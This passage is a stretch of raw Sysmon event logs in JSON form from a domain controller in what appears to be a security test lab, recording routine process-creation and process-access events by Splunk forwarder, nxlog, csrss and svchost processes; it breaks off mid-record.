(R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:56.427","ProcessGuid":"{E2A3D6B1-110C-5F25-0000-0010A0E80500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4076,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:56.426\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-110C-5F25-0000-0010A0E80500}\r\nTargetProcessId: 2664\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:56.426","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-110C-5F25-0000-0010A0E80500}","TargetProcessId":"2664","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4077,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:56.426\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-110C-5F25-0000-0010A0E80500}\r\nTargetProcessId: 2664\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:56.426","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-110C-5F25-0000-0010A0E80500}","TargetProcessId":"2664","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4078,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:56.426\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:56.426","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4079,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:56.426\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:56.426","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4080,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:56.426\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:56.426","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4081,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:56.426\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:56.426","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4082,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:56.426\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:56.426","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4083,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:56.426\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 